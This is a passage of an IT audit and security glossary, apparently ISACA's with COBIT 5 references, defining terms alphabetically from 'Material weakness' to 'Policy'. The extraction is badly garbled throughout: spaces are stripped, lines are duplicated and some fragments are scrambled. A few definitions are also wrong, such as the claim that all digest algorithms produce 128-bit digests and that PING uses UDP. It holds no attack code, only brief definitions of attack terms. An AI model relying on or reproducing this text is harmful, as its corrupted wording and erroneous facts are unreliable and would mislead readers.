Materialweakness Adeficiencyoracombinationofdeficienciesininternalcontrol,suchthatthereisareasonable
possibilitythatamaterialmisstatementwillnotbepreventedordetectedonatimelybasis.
Weaknessincontrolisconsideredmaterialiftheabsenceofthecontrolresultsinfailureto
providereasonableassurancethatthecontrolobjectivewillbemet.Aweaknessclassifiedas
materialimpliesthat:
Controlsarenotinplaceand/orcontrolsarenotinuseand/orcontrolsareinadequate
Escalationiswarranted
Thereisaninverserelationshipbetweenmaterialityandthelevelofauditriskacceptableto
theISauditorassuranceprofessional,i.e.,thehigherthematerialitylevel,thelowerthe
acceptabilityoftheauditrisk,andviceversa.
Materiality Anauditingconceptregardingtheimportanceofanitemofinformationwithregardtoits
impactoreffectonthefunctioningoftheentitybeingaudited
Anexpressionoftherelativesignificanceorimportanceofaparticularmatterinthecontextof
the enterprise as a whole theenterpriseasawhole
Maturity Inbusiness,indicatesthedegreeofreliabilityordependencythatthebusinesscanplaceona
processachievingthedesiredgoalsorobjectives
Maturitymodel
ScopeNote:SeeCapabilityMaturityModel(CMM).
Term Definition
Maximumtolerable
outages (MTO)
Maximumtimethatanenterprisecansupportprocessinginalternatemode
outages(MTO)
Measure Astandardusedtoevaluateandcommunicateperformanceagainstexpectedresults
ScopeNote:Measuresarenormallyquantitativeinnaturecapturingnumbers,dollars,
percentages,etc.,butcanalsoaddressqualitativeinformationsuchascustomersatisfaction.
Reportingandmonitoringmeasureshelpanenterprisegaugeprogresstowardeffective
implementation of strategy implementationofstrategy.
Mediaaccesscontrol
(MAC)
Appliedtothehardwareatthefactoryandcannotbemodified,MACisaunique,48bit,hard
codedaddressofaphysicallayerdevice,suchasanEthernetlocalareanetwork(LAN)ora
wirelessnetworkcard
Mediaaccesscontrol
(MAC)address
Auniqueidentifierassignedtonetworkinterfacesforcommunicationsonthephysicalnetwork
segment
Mediaoxidation Thedeteriorationofthemediaonwhichdataaredigitallystoredduetoexposuretooxygen
andmoisture
ScopeNote:Tapesdeterioratinginawarm,humidenvironmentareanexampleofmedia
oxidation.Properenvironmentalcontrolsshouldprevent,orsignificantlyslow,thisprocess.
Memorydump Theactofcopyingrawdatafromoneplacetoanotherwithlittleornoformattingfor
readability
ScopeNote:Usually,dumpreferstocopyingdatafromthemainmemorytoadisplayscreen
oraprinter.Dumpsareusefulfordiagnosingbugs.Afteraprogramfails,onecanstudythe
dumpandanalyzethecontentsofmemoryatthetimeofthefailure.Amemorydumpwillnot
helpunlesseachpersonknowswhattolookforbecausedumpsareusuallyoutputinadifficult
toreadform(binary,octalorhexadecimal).
Message
authenticationcode
AnAmericanNationalStandardsInstitute(ANSI)standardchecksumthatiscomputedusing
DataEncryptionStandard(DES)
Messagedigest Asmallerextrapolatedversionoftheoriginalmessagecreatedusingamessagedigest
algorithm
Message digest Message digest algorithms are SHA1 MD2 MD4 and MD5 These algorithms are one way Messagedigest
algorithm
MessagedigestalgorithmsareSHA1,MD2,MD4andMD5.Thesealgorithmsareoneway
functionsunlikeprivateandpublickeyencryptionalgorithms.
ScopeNote:Alldigestalgorithmstakeamessageofarbitrarylengthandproducea128bit
messagedigest.
Messageswitching Atelecommunicationsmethodologythatcontrolstrafficinwhichacompletemessageissent
to a concentration point and stored until the communications path is established toaconcentrationpointandstoreduntilthecommunicationspathisestablished
Term Definition
Metric Aquantifiableentitythatallowsthemeasurementoftheachievementofaprocessgoal
ScopeNote:MetricsshouldbeSMARTspecific,measurable,actionable,relevantandtimely.
Completemetricguidancedefinestheunitused,measurementfrequency,idealtargetvalue(if
appropriate)andalsotheproceduretocarryoutthemeasurementandtheprocedureforthe
interpretationoftheassessment.
Metropolitanarea Adatanetworkintendedtoserveanareathesizeofalargecity Metropolitanarea
network(MAN)
Adatanetworkintendedtoserveanareathesizeofalargecity
Microwave
transmission
Ahighcapacitylineofsighttransmissionofdatasignalsthroughtheatmospherewhichoften
requiresrelaystations
Middleware Anothertermforanapplicationprogrammerinterface(API)
Itreferstotheinterfacesthatallowprogrammerstoaccesslowerorhigherlevelservicesby p g g y
providinganintermediarylayerthatincludesfunctioncallstotheservices.
Milestone Aterminalelementthatmarksthecompletionofaworkpackageorphase
ScopeNote:Typicallymarkedbyahighleveleventsuchasprojectcompletion,receipt,
endorsementorsigningofapreviouslydefineddeliverableorahighlevelreviewmeetingat
whichtheappropriatelevelofprojectcompletionisdeterminedandagreedto.Amilestoneis pp p p j p g
associatedwithadecisionthatoutlinesthefutureofaprojectand,foranoutsourcedproject,
mayhaveapaymenttothecontractorassociatedwithit.
Miniaturefragment
attack
Usingthismethod,anattackerfragmentstheIPpacketintosmalleronesandpushesit
throughthefirewall,inthehopethatonlythefirstofthesequenceoffragmentedpackets
wouldbeexaminedandtheotherswouldpasswithoutreview.
Mi d it A lt t it th t t i th i f ti th i i l Mirroredsite Analternatesitethatcontainsthesameinformationastheoriginal
ScopeNote:Mirroredsitesaresetupforbackupanddisasterrecoveryandtobalancethe
trafficloadfornumerousdownloadrequests.Suchdownloadmirrorsareoftenplacedin
differentlocationsthroughouttheInternet.
Missioncritical
application
Anapplicationthatisvitaltotheoperationoftheenterprise.Thetermisverypopularfor
describing the applications required to run the day to day business application describingtheapplicationsrequiredtorunthedaytodaybusiness.
Misusedetection Detectiononthebasisofwhetherthesystemactivitymatchesthatdefinedas"bad"
Mobilecomputing Extendstheconceptofwirelesscomputingtodevicesthatenablenewkindsofapplications
andexpandanenterprisenetworktoreachplacesincircumstancesthatcouldneverhave
beendonebyothermeans
Scope Note: Mobile computing is comprised of personal digital assistants (PDAs) cellular ScopeNote:Mobilecomputingiscomprisedofpersonaldigitalassistants(PDAs),cellular
phones,laptopsandothertechnologiesofthiskind.
Mobiledevice Asmall,handheldcomputingdevices,typicallyhavingadisplayscreenwithtouchinputand/or
aminiaturekeyboardandweighinglessthantwopounds
Term Definition
Mobilesite Theuseofamobile/temporaryfacilitytoserveasabusinessresumptionlocation
Thefacilitycanusuallybedeliveredtoanysiteandcanhouseinformationtechnologyand
staff.
Model Awaytodescribeagivensetofcomponentsandhowthosecomponentsrelatetoeachother
inordertodescribethemainworkingsofanobject,system,orconcept
Scope Note: COBIT 5 perspective ScopeNote:COBIT5perspective
MODEM
(modulator/demodula
tor)
Connectsaterminalorcomputertoacommunicationsnetworkviaatelephoneline
Modemsturndigitalpulsesfromthecomputerintofrequencieswithintheaudiorangeofthe
telephonesystem.Whenactinginthereceivercapacity,amodemdecodesincoming
frequencies.
Modulation Theprocessofconvertingadigitalcomputersignalintoananalogtelecommunicationssignal p g g p g g g
Monetaryunit
sampling
Asamplingtechniquethatestimatestheamountofoverstatementinanaccountbalance
Monitoringpolicy Rulesoutliningordelineatingthewayinwhichinformationabouttheuseofcomputers,
networks,applicationsandinformationiscapturedandinterpreted
Multifactor Acombinationofmorethanoneauthenticationmethod,suchastokenandpassword(or
authentication personalidentificationnumber[PIN]ortokenandbiometricdevice).
Multiplexor Adeviceusedforcombiningseverallowerspeedchannelsintoahigherspeedchannel
Mutualtakeover Afailoverprocess,whichisbasicallyatwowayidlestandby:twoserversareconfiguredso
thatbothcantakeovertheothernodesresourcegroup.Bothmusthaveenoughcentral
processingunit(CPU)powertorunbothapplicationswithsufficientspeed,orexpected
f l b k l h f l d d performancelossesmustbetakenintoaccountuntilthefailednodereintegrates.
NationalInstitutefor
Standardsand
Technology(NIST)
Developstests,testmethods,referencedata,proofofconceptimplementations,andtechnical
analysestoadvancethedevelopmentandproductiveuseofinformationtechnology
ScopeNote:NISTisaUSgovernmententitythatcreatesmandatorystandardsthatare
f ll d b f d l i d th d i b i ith th followedbyfederalagenciesandthosedoingbusinesswiththem.
Netpresentvalue
(NPV)
Calculatedbyusinganaftertaxdiscountrateofaninvestmentandaseriesofexpected
incrementalcashoutflows(theinitialinvestmentandoperationalcosts)andcashinflows(cost
savingsorrevenues)thatoccuratregularperiodsduringthelifecycleoftheinvestment
Scope Note: To arrive at a fair NPV calculation cash inflows accrued by the business up to ScopeNote:ToarriveatafairNPVcalculation,cashinflowsaccruedbythebusinessupto
aboutfiveyearsafterprojectdeploymentalsoshouldbetakenintoaccount.
Netreturn Therevenuethataprojectorbusinessmakesaftertaxandotherdeductions;oftenalso
classifiedasnetprofit
Term Definition
Netcat AsimpleUNIXutility,whichreadsandwritesdataacrossnetworkconnectionsusing
Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) It is designed to be a TransmissionControlProtocol(TCP)orUserDatagramProtocol(UDP).Itisdesignedtobea
reliablebackendtoolthatcanbeuseddirectlyoriseasilydrivenbyotherprogramsand
scripts.Atthesametime,itisafeaturerichnetworkdebuggingandexplorationtool,because
itcancreatealmostanykindofconnectionneededandhasseveralinterestingbuiltin
capabilities.NetcatisnowpartoftheRedHatPowerToolscollectionandcomesstandardon
SuSELinux,DebianLinux,NetBSDandOpenBSDdistributions.
Netcentric
technologies
Thecontentsandsecurityofinformationorobjects(softwareanddata)onthenetworkare
nowofprimeimportancecomparedwithtraditionalcomputerprocessingthatemphasizesthe
locationofhardwareanditsrelatedsoftwareanddata.
ScopeNote:AnexampleofnetcentrictechnologiesistheInternet,wherethenetworkisits
primaryconcern. primaryconcern.
Netware Apopularlocalareanetwork(LAN)operatingsystem(OS)developedbytheNovellCorp.
Network Asystemofinterconnectedcomputersandthecommunicationequipmentusedtoconnect
them
Networkaddress
translation(NAT)
AmethodologyofmodifyingnetworkaddressinformationinIPdatagrampacketheaderswhile
theyareintransitacrossatrafficroutingdeviceforthepurposeofremappingoneIPaddress
spaceintoanother
Network
administrator
Responsibleforplanning,implementingandmaintainingthetelecommunications
infrastructure;alsomayberesponsibleforvoicenetworks
ScopeNote:Forsmallerenterprises,thenetworkadministratormayalsomaintainalocalarea
network(LAN)andassistendusers.
N t k tt h d Utili d di t d t d i th t t li t f d t Networkattached
storage(NAS)
Utilizesdedicatedstoragedevicesthatcentralizestorageofdata
ScopeNote:NAstoragedevicesgenerallydonotprovidetraditionalfile/printorapplication
services.
Networkbasic
input/outputsystem
(NetBIOS)
Aprogramthatallowsapplicationsondifferentcomputerstocommunicatewithinalocalarea
network(LAN).
(NetBIOS)
Networkhop Anattackstrategyinwhichtheattackersuccessivelyhacksintoaseriesofconnectedsystems,
obscuringhis/heridentifyfromthevictimoftheattack
Networkinterface
card(NIC)
Acommunicationcardthatwheninsertedintoacomputer,allowsittocommunicatewith
othercomputersonanetwork
Scope Note: Most NICs are designed for a particular type of network or protocol ScopeNote:MostNICsaredesignedforaparticulartypeofnetworkorprotocol.
Networknews
transferprotocol
(NNTP)
Usedforthedistribution,inquiry,retrieval,andpostingofNetnewsarticlesusingareliable
streambasedmechanism.Fornewsreadingclients,NNTPenablesretrievalofnewsarticles
thatarestoredinacentraldatabase,givingsubscriberstheabilitytoselectonlythosearticles
theywishtoread.(RFC3977)
Term Definition
Network
segmentation
Acommontechniquetoimplementnetworksecurityistosegmentanorganizationsnetwork
into separate zones that can be separately controlled monitored and protected segmentation intoseparatezonesthatcanbeseparatelycontrolled,monitoredandprotected.
Networktraffic
analysis
Identifiespatternsinnetworkcommunications
ScopeNote:Trafficanalysisdoesnotneedtohavetheactualcontentofthecommunication
butanalyzeswheretrafficistakingplace,whenandforhowlongcommunicationsoccurand
the size of information transferred thesizeofinformationtransferred.
Node Pointatwhichterminalsaregivenaccesstoanetwork
Noise Disturbancesindatatransmissions,suchasstatic,thatcausemessagestobemisinterpreted
bythereceiver
Nondisclosure
agreement(NDA)
Alegalcontractbetweenatleasttwopartiesthatoutlinesconfidentialmaterialsthatthe
partieswishtosharewithoneanotherforcertainpurposes,butwishtorestrictfrom
generalizeduse;acontractthroughwhichthepartiesagreenottodiscloseinformation g ; g p g
coveredbytheagreement
ScopeNote:Alsocalledaconfidentialdisclosureagreement(CDA),confidentialityagreement
orsecrecyagreement.AnNDAcreatesaconfidentialrelationshipbetweenthepartiesto
protectanytypeoftradesecret.Assuch,anNDAcanprotectnonpublicbusinessinformation.
Inthecaseofcertaingovernmentalentities,theconfidentialityofinformationotherthan g , y
tradesecretsmaybesubjecttoapplicablestatutoryrequirements,andinsomecasesmaybe
requiredtoberevealedtoanoutsidepartyrequestingtheinformation.Generally,the
governmentalentitywillincludeaprovisioninthecontracttoallowthesellertoreviewa
requestforinformationthattheselleridentifiesasconfidentialandthesellermayappealsuch
adecisionrequiringdisclosure.NDAsarecommonlysignedwhentwocompaniesorindividuals
are considering doing business together and need to understand the processes used in one
N i t i Th f t t d b t t bl i f ti t k t ffi d id tif Nonintrusive
monitoring
Theuseoftransportedprobesortracestoassembleinformation,tracktrafficandidentify
vulnerabilities
Nonrepudiable
transaction
Transactionthatcannotbedeniedafterthefact
Nonrepudiation Theassurancethatapartycannotlaterdenyoriginatingdata;provisionofproofofthe
integrityandoriginofthedataandthatcanbeverifiedbyathirdparty
ScopeNote:Adigitalsignaturecanprovidenonrepudiation.
Nonstatistical
sampling
Methodofselectingaportionofapopulation,bymeansofownjudgementandexperience,
forthepurposeofquicklyconfirmingaproposition.Thismethoddoesnotallowdrawing
mathematicalconclusionsontheentirepopulation.
Normalization Theeliminationofredundantdata
Numeric check An edit check designed to ensure that the data element in a particular field is numeric. Numericcheck Aneditcheckdesignedtoensurethatthedataelementinaparticularfieldisnumeric.
Obfuscation Thedeliberateactofcreatingsourceormachinecodethatisdifficultforhumansto
understand
Objectcode Machinereadableinstructionsproducedfromacompilerorassemblerprogramthathas
acceptedandtranslatedthesourcecode
Term Definition
Objectmanagement
group (OMG)
Aconsortiumwithmorethan700affiliatesfromthesoftwareindustrywhosepurposeisto
provide a common framework for developing applications using objectoriented programming group(OMG) provideacommonframeworkfordevelopingapplicationsusingobjectorientedprogramming
techniques
ScopeNote:Forexample,OMGisknownprincipallyforpromulgatingtheCommonObject
RequestBrokerArchitecture(CORBA)specification.
Objectorientation Anapproachtosystemdevelopmentinwhichthebasicunitofattentionisanobject,which
represents an encapsulation of both data (an objects attributes) and functionality (an objects representsanencapsulationofbothdata(anobject sattributes)andfunctionality(anobject s
methods)
ScopeNote:Objectsusuallyarecreatedusingageneraltemplatecalledaclass.Aclassisthe
basisformostdesignworkinobjects.Aclassanditsobjectscommunicateindefinedways.
Aggregateclassesinteractthroughmessages,whicharedirectedrequestsforservicesfrom
oneclass(theclient)toanotherclass(theserver).Aclassmaysharethestructureormethods oneclass(theclient)toanotherclass(theserver).Aclassmaysharethestructureormethods
definedinoneormoreotherclassesarelationshipknownasinheritance.
Objective Statementofadesiredoutcome
Objectivity Theabilitytoexercisejudgment,expressopinionsandpresentrecommendationswith
impartiality
Objectoriented
systemdevelopment
Asystemdevelopmentmethodologythatisorganizedaround"objects"ratherthan"actions,"
and"data"ratherthan"logic"
ScopeNote:Objectorientedanalysisisanassessmentofaphysicalsystemtodetermine
whichobjectsintherealworldneedtoberepresentedasobjectsinasoftwaresystem.Any
objectorienteddesignissoftwaredesignthatiscenteredarounddesigningtheobjectsthat
willmakeupaprogram.Anyobjectorientedprogramisonethatiscomposedofobjectsor
softwareparts.
Offlinefiles Computerfilestoragemediathatarenotphysicallyconnectedtothecomputer;typical
examplesaretapesortapecartridgesusedforbackuppurposes.
Offsitestorage Afacilitylocatedawayfromthebuildinghousingtheprimaryinformationprocessingfacility
(IPF) used for storage of computer media such as offline backup data and storage files (IPF),usedforstorageofcomputermediasuchasofflinebackupdataandstoragefiles
Onlinedata
processing
Achievedbyenteringinformationintothecomputerviaavideodisplayterminal
ScopeNote:Withonlinedataprocessing,thecomputerimmediatelyacceptsorrejectsthe
informationasitisentered.
Open Source Security An open and freely available methodology and manual for security testing OpenSourceSecurity
TestingMethodology
Anopenandfreelyavailablemethodologyandmanualforsecuritytesting
Term Definition
Opensystem Systemforwhichdetailedspecificationsofthecompositionofitscomponentarepublishedin
a nonproprietary environment thereby enabling competing enterprises to use these standard anonproprietaryenvironment,therebyenablingcompetingenterprisestousethesestandard
componentstobuildcompetitivesystems
ScopeNote:Theadvantagesofusingopensystemsincludeportability,interoperabilityand
integration.
OpenSystems
Interconnect (OSI)
Amodelforthedesignofanetwork.Theopensystemsinterconnect(OSI)modeldefines
groups of functionality required to network computers into layers. Each layer implements a Interconnect(OSI)
model
groupsoffunctionalityrequiredtonetworkcomputersintolayers.Eachlayerimplementsa
standardprotocoltoimplementitsfunctionality.TherearesevenlayersintheOSImodel.
OpenWeb
ApplicationSecurity
Project(OWASP)
Anopencommunitydedicatedtoenablingorganizationstoconceive,develop,acquire,
operate,andmaintainapplicationsthatcanbetrusted
Operatingsystem Amastercontrolprogramthatrunsthecomputerandactsasaschedulerandtrafficcontroller p g y
(OS)
p g p
ScopeNote:Theoperatingsystemisthefirstprogramcopiedintothecomputersmemory
afterthecomputeristurnedon;itmustresideinmemoryatalltimes.Itisthesoftwarethat
interfacesbetweenthecomputerhardware(disk,keyboard,mouse,network,modem,printer)
andtheapplicationsoftware(wordprocessor,spreadsheet,email),whichalsocontrolsaccess
tothedevicesandispartiallyresponsibleforsecuritycomponentsandsetsthestandardsfor p y p y p
theapplicationprogramsthatruninit.
Operatingsystem
audittrail
Recordofsystemeventsgeneratedbyaspecializedoperatingsystemmechanism
Operationalaudit Anauditdesignedtoevaluatethevariousinternalcontrols,economyandefficiencyofa
functionordepartment
O ti l t l D l ith th d ti f t i t th t ll bj ti Operationalcontrol Dealswiththeeverydayoperationofacompanyorenterprisetoensurethatallobjectivesare
achieved
Operationallevel
agreement(OLA)
AninternalagreementcoveringthedeliveryofservicesthatsupporttheITorganizationinits
deliveryofservices
Operatorconsole Aspecialterminalusedbycomputeroperationspersonneltocontrolcomputerandsystems
operationsfunctions
ScopeNote:Operatorconsoleterminalstypicallyprovideahighlevelofcomputeraccessand
shouldbeproperlysecured.
Opticalcharacter
recognition(OCR)
Usedtoelectronicallyscanandinputwritteninformationfromasourcedocument
Opticalscanner Aninputdevicethatreadscharactersandimagesthatareprintedorpaintedonapaperform
into the computer intothecomputer
Organization Themannerinwhichanenterpriseisstructured;canalsomeantheentity
Term Definition
Organizationfor
Economic
Aninternationalorganizationhelpinggovernmentstackletheeconomic,socialandgovernance
challenges of a global economy Economic
Cooperationand
Development(OECD)
challengesofaglobaleconomy
ScopeNote:TheOECDgroups30membercountriesinauniqueforumtodiscuss,develop,
andrefineeconomicandsocialpolicies.
Organizational
structure
Anenablerofgovernanceandofmanagement.Includestheenterpriseanditsstructures,
hierarchiesanddependencies.
ScopeNote:Example:Steeringcommittee
COBIT5perspective
Outcome Result
Outcomemeasure Representstheconsequencesofactionspreviouslytaken;oftenreferredtoasalagindicator
ScopeNote:Outcomemeasurefrequentlyfocusesonresultsattheendofatimeperiodand
characterizehistoricperformance.Theyarealsoreferredtoasakeygoalindicator(KGI)and
usedtoindicatewhethergoalshavebeenmet.Thesecanbemeasuredonlyafterthefactand,
therefore,arecalled"lagindicators."
Outputanalyzer Checkstheaccuracyoftheresultsproducedbyatestrun
ScopeNote:Therearethreetypesofchecksthatanoutputanalyzercanperform.First,ifa
standardsetoftestdataandtestresultsexistforaprogram,theoutputofatestrunafter
programmaintenancecanbecomparedwiththesetofresultsthatshouldbeproduced.
Second,asprogrammerspreparetestdataandcalculatetheexpectedresults,theseresults
canbestoredinafileandtheoutputanalyzercomparestheactualresultsofatestrunwith
theexpectedresults.Third,theoutputanalyzercanactasaquerylanguage;itacceptsqueries
aboutwhethercertainrelationshipsexistinthefileofoutputresultsandreportscompliance
ornoncompliance.
Outsourcing AformalagreementwithathirdpartytoperformISorotherbusinessfunctionsforan
enterprise
Owner Individual or group that holds or possesses the rights of and the responsibilities for an Owner Individualorgroupthatholdsorpossessestherightsofandtheresponsibilitiesforan
enterprise,entityorasset.
ScopeNote:Examples:processowner,systemowner
COBIT5perspective
Packet Data unit that is routed from source to destination in a packetswitched network Packet Dataunitthatisroutedfromsourcetodestinationinapacketswitchednetwork
ScopeNote:Apacketcontainsbothroutinginformationanddata.TransmissionControl
Protocol/InternetProtocol(TCP/IP)issuchapacketswitchednetwork.
Term Definition
Packetfiltering Controllingaccesstoanetworkbyanalyzingtheattributesoftheincomingandoutgoing
packets and either letting them pass or denying them based on a list of rules packetsandeitherlettingthempass,ordenyingthem,basedonalistofrules
Packetinternet
groper(PING)
AnInternetprogram(InternetControlMessageProtocol[ICMP])usedtodeterminewhethera
specificIPaddressisaccessibleoronline
ItisanetworkapplicationthatusesUserDatagramProtocol(UDP)toverifyreachabilityof
another host on the connected network anotherhostontheconnectednetwork.
ScopeNote:Itworksbysendingapackettothespecifiedaddressandwaitingforareply.PING
isusedprimarilytotroubleshootInternetconnections.Inaddition,PINGreportsthenumberof
hopsrequiredtoconnecttwoInternethosts.TherearebothfreewareandsharewarePING
utilities available for personal computers (PCs).
Packetswitching Theprocessoftransmittingmessagesinconvenientpiecesthatcanbereassembledatthe g p g g p
destination
Papertest Awalkthroughofthestepsofaregulartest,butwithoutactuallyperformingthesteps
ScopeNote:Usuallyusedindisasterrecoveryandcontingencytesting;teammembersreview
andbecomefamiliarwiththeplansandtheirspecificrolesandresponsibilities
Parallelsimulation InvolvesanISauditorwritingaprogramtoreplicatethoseapplicationprocessesthatare
criticaltoanauditopinionandusingthisprogramtoreprocessapplicationsystemdata
ScopeNote:Theresultsproducedbyparallelsimulationarecomparedwiththeresults
generatedbytheapplicationsystemandanydiscrepanciesareidentified.
Paralleltesting Theprocessoffeedingtestdataintotwosystems,themodifiedsystemandanalternative
( ibl h i i l ) d i l d h i system(possiblytheoriginalsystem),andcomparingresultstodemonstratetheconsistency
andinconsistencybetweentwoversionsoftheapplication
Paritycheck Ageneralhardwarecontrolthathelpstodetectdataerrorswhendataarereadfrommemory
orcommunicatedfromonecomputertoanother
Scope Note: A 1 bit digit (either 0 or 1) is added to a data item to indicate whether the sum of ScopeNote:A1bitdigit(either0or1)isaddedtoadataitemtoindicatewhetherthesumof
thatdataitemsbitisoddoreven.Whentheparitybitdisagreeswiththesumoftheother
bits,thecomputerreportsanerror.Theprobabilityofaparitycheckdetectinganerroris50
percent.
Partitionedfile Afileformatinwhichthefileisdividedintomultiplesubfilesandadirectoryisestablishedto
locateeachsubfile
Term Definition
Passiveassault Intrudersattempttolearnsomecharacteristicofthedatabeingtransmitted
ScopeNote:Withapassiveassault,intrudersmaybeabletoreadthecontentsofthedataso
theprivacyofthedataisviolated.Alternatively,althoughthecontentofthedataitselfmay
remainsecure,intrudersmayreadandanalyzetheplaintextsourceanddestinationidentifiers
attachedtoamessageforroutingpurposes,ortheymayexaminethelengthsandfrequencyof
messagesbeingtransmitted.
Passiveresponse Aresponseoptioninintrusiondetectioninwhichthesystemsimplyreportsandrecordsthe Passiveresponse Aresponseoptioninintrusiondetectioninwhichthesystemsimplyreportsandrecordsthe
problemdetected,relyingontheusertotakesubsequentaction
Password Aprotected,generallycomputerencryptedstringofcharactersthatauthenticateacomputer
usertothecomputersystem
Passwordcracker Atoolthatteststhestrengthofuserpasswordsbysearchingforpasswordsthatareeasyto
guess
Itrepeatedlytrieswordsfromspeciallycrafteddictionariesandoftenalsogenerates
thousands(andinsomecases,evenmillions)ofpermutationsofcharacters,numbersand
symbols.
Patch Fixestosoftwareprogrammingerrorsandvulnerabilities
Patchmanagement Anareaofsystemsmanagementthatinvolvesacquiring,testingandinstallingmultiplepatches
(codechanges)toanadministeredcomputersysteminordertomaintainuptodatesoftware
andoftentoaddresssecurityrisk
ScopeNote:Patchmanagementtasksincludethefollowing:maintainingcurrentknowledge
ofavailablepatches;decidingwhatpatchesareappropriateforparticularsystems;ensuring
thatpatchesareinstalledproperly;testingsystemsafterinstallation;anddocumentingall
associatedprocedures,suchasspecificconfigurationsrequired.Anumberofproductsare
availabletoautomatepatchmanagementtasks.Patchesaresometimesineffectiveandcan
sometimescausemoreproblemsthantheyfix.Patchmanagementexpertssuggestthat
systemadministratorstakesimplestepstoavoidproblems,suchasperformingbackupsand
testingpatchesonnoncriticalsystemspriortoinstallations.Patchmanagementcanbeviewed
aspartofchangemanagement.
Payback period The length of time needed to recoup the cost of capital investment Paybackperiod Thelengthoftimeneededtorecoupthecostofcapitalinvestment
ScopeNote:Financialamountsinthepaybackformulaarenotdiscounted.Notethatthe
paybackperioddoesnottakeintoaccountcashflowsafterthepaybackperiodandthereforeis
notameasureoftheprofitabilityofaninvestmentproject.Thescopeoftheinternalrateof
return(IRR),netpresentvalue(NPV)andpaybackperiodistheusefuleconomiclifeofthe
project up to a maximum of five years projectuptoamaximumoffiveyears.
Payload Thesectionoffundamentaldatainatransmission.Inmalicioussoftwarethisreferstothe
sectioncontainingtheharmfuldata/code.
Paymentsystem Afinancialsystemthatestablishesthemeansfortransferringmoneybetweensuppliersand
usersoffunds,ordinarilybyexchangingdebitsorcreditsbetweenbanksorfinancial
institutions
Term Definition
Payrollsystem Anelectronicsystemforprocessingpayrollinformationandtherelatedelectronic(e.g.,
electronic timekeeping and/or human resources [HR] system) human (e g payroll clerk) and electronictimekeepingand/orhumanresources[HR]system),human(e.g.,payrollclerk),and
externalparty(e.g.,bank)interfaces
Inamorelimitedsense,itistheelectronicsystemthatperformstheprocessingforgenerating
payrollchecksand/orbankdirectdepositstoemployees.
Penetrationtesting Alivetestoftheeffectivenessofsecuritydefensesthroughmimickingtheactionsofreallife
attackers attackers
Performance InIT,theactualimplementationorachievementofaprocess
Performancedriver Ameasurethatisconsideredthe"driver"ofalagindicator
Itcanbemeasuredbeforetheoutcomeisclearand,therefore,iscalleda"leadindicator."
ScopeNote:Thereisanassumedrelationshipbetweenthetwothatsuggeststhatimproved ScopeNote:Thereisanassumedrelationshipbetweenthetwothatsuggeststhatimproved
performanceinaleadingindicatorwilldrivebetterperformanceinthelaggingindicator.They
arealsoreferredtoaskeyperformanceindicators(KPIs)andareusedtoindicatewhether
goalsarelikelytobemet.
Performance
indicators
Asetofmetricsdesignedtomeasuretheextenttowhichperformanceobjectivesarebeing
achievedonanongoingbasis
ScopeNote:Performanceindicatorscanincludeservicelevelagreements(SLAs),critical
successfactors(CSFs),customersatisfactionratings,internalorexternalbenchmarks,industry
bestpracticesandinternationalstandards.
Performance
management
InIT,theabilitytomanageanytypeofmeasurement,includingemployee,team,process,
operationalorfinancialmeasurements
Thetermconnotesclosedloopcontrolandregularmonitoringofthemeasurement.
Performancetesting Comparingthesystemsperformancetootherequivalentsystems,usingwelldefined
benchmarks
Peripherals Auxiliarycomputerhardwareequipmentusedforinput,outputanddatastorage
Scope Note: Examples of peripherals include disk drives and printers ScopeNote:Examplesofperipheralsincludediskdrivesandprinters.
Personaldigital
assistant(PDA)
Alsocalledpalmtopandpocketcomputer,PDAisahandhelddevicethatprovidecomputing,
Internet,networkingandtelephonecharacteristics.
Personal
identificationnumber
(PIN)
Atypeofpassword(i.e.,asecretnumberassignedtoanindividual)that,inconjunctionwith
somemeansofidentifyingtheindividual,servestoverifytheauthenticityoftheindividual
Scope Note: PINs have been adopted by financial institutions as the primary means of ScopeNote:PINshavebeenadoptedbyfinancialinstitutionsastheprimarymeansof
verifyingcustomersinanelectronicfundstransfer(EFT)system.
PervasiveIScontrol GeneralcontroldesignedtomanageandmonitortheISenvironmentandwhich,therefore,
affectsallISrelatedactivities
Term Definition
PhaseofBCP Astepbystepapproachconsistingofvariousphases
ScopeNote:PhaseofBCPisusuallycomprisedofthefollowingphases:preimplementation
phase,implementationphase,testingphase,andpostimplementationphase.
Phishing Thisisatypeofelectronicmail(email)attackthatattemptstoconvinceauserthatthe
originatorisgenuine,butwiththeintentionofobtaininginformationforuseinsocial
engineering engineering
ScopeNote:Phishingattacksmaytaketheformofmasqueradingasalotteryorganization
advisingtherecipientortheuser'sbankofalargewin;ineithercase,theintentistoobtain
accountandpersonalidentificationnumber(PIN)details.Alternativeattacksmayseekto
obtainapparentlyinnocuousbusinessinformation,whichmaybeusedinanotherformof
active attack. active attack.
Phreakers Thosewhocracksecurity,mostfrequentlytelephoneandothercommunicationnetworks
Piggybacking 1.Followinganauthorizedpersonintoarestrictedaccessarea
2.Electronicallyattachingtoanauthorizedtelecommunicationslinktointerceptandpossibly
altertransmissions
Plainoldtelephone
service(POTS)
Awiredtelecommunicationssystem.
Plaintext Digitalinformation,suchascleartext,thatisintelligibletothereader
PlatformasaService
(PaaS)
Offersthecapabilitytodeployontothecloudinfrastructurecustomercreatedoracquired
applicationsthatarecreatedusingprogramminglanguagesandtoolssupportedbythe
provider
PMBOK (P j t A j t t t d d d l d b th P j t M t I tit t (PMI) PMBOK(Project
ManagementBodyof
Knowledge)
AprojectmanagementstandarddevelopedbytheProjectManagementInstitute(PMI)
Pointofpresence
(POP)
AtelephonenumberthatrepresentstheareainwhichthecommunicationproviderorInternet
serviceprovider(ISP)providesservice
Pointofsale(POS)
systems
Enablesthecaptureofdataatthetimeandplaceoftransaction
systems
ScopeNote:POSterminalsmayincludeuseofopticalscannersforusewithbarcodesor
magneticcardreadersforusewithcreditcards.POSsystemsmaybeonlinetoacentral
computerormayusestandaloneterminalsormicrocomputersthatholdthetransactionsuntil
theendofaspecifiedperiodwhentheyaresenttothemaincomputerforbatchprocessing.
Pointtopoint A protocol used for transmitting data between two ends of a connection Pointtopoint
Protocol(PPP)
Aprotocolusedfortransmittingdatabetweentwoendsofaconnection
Pointtopoint
TunnelingProtocol
(PPTP)
Aprotocolusedtotransmitdatasecurelybetweentwoendpointstocreateavirtualprivate
network(VPN).
Term Definition
Policy 1.Generally,adocumentthatrecordsahighlevelprincipleorcourseofactionthathasbeen
decided on decidedon
Theintendedpurposeistoinfluenceandguidebothpresentandfuturedecisionmakingtobe
inlinewiththephilosophy,objectivesandstrategicplansestablishedbytheenterprises
managementteams.
Scope Note: In addition to policy content policies need to describe the consequences of ScopeNote:Inadditiontopolicycontent,policiesneedtodescribetheconsequencesof
